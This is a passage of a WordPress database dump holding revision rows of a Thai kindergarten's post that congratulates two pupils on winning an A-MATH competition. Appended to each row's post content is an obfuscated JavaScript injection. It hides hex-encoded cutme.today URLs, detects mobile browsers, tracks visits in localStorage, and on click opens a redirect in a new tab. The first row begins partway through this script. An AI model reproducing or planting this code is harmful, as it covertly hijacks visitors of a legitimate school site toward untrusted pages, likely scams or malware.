_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','','','inherit','closed','closed','','158-revision-v1','','','2024-08-06 13:24:50','2024-08-06 06:24:50','',158,'http://watprato.ssk.in.th/?p=164',0,'revision','',0),
(165,1,'2024-08-06 13:24:51','2024-08-06 06:24:51','<!-- wp:paragraph -->\n<p>โรงเรียนอนุบาลวัดพระโต</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ขอแสดงความยินดีกับนักเรียนคนเก่ง <img height=\"16\" width=\"16\" alt=\"✨\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/tf4/1/16/2728.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>เด็กหญิงกชพรรณ ชาตรูปไพศาล</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>เด็กหญิงศศินิภา ทองพิทักษ์</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ได้รับรางวัลชนะเลิศการแข่งขัน A-MATH ประจาปี 2567 “ฝึกความคิดพิชิตสมอง ท้าประลอง A-MATH” ระดับประถมศึกษาปีที่ 1-6</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a></a>จัดโดย สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','','','inherit','closed','closed','','158-revision-v1','','','2024-08-06 13:24:51','2024-08-06 06:24:51','',158,'http://watprato.ssk.in.th/?p=165',0,'revision','',0),
(166,1,'2024-08-06 13:25:44','2024-08-06 06:25:44','<!-- wp:paragraph -->\n<p>โรงเรียนอนุบาลวัดพระโต</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ขอแสดงความยินดีกับนักเรียนคนเก่ง <img height=\"16\" width=\"16\" alt=\"✨\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/tf4/1/16/2728.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>เด็กหญิงกชพรรณ ชาตรูปไพศาล</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>เด็กหญิงศศินิภา ทองพิทักษ์</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ได้รับรางวัลชนะเลิศการแข่งขัน A-MATH ประจาปี 2567 “ฝึกความคิดพิชิตสมอง ท้าประลอง A-MATH” ระดับประถมศึกษาปีที่ 1-6</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a></a>จัดโดย สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','','','inherit','closed','closed','','158-revision-v1','','','2024-08-06 13:25:44','2024-08-06 06:25:44','',158,'http://watprato.ssk.in.th/?p=166',0,'revision','',0),
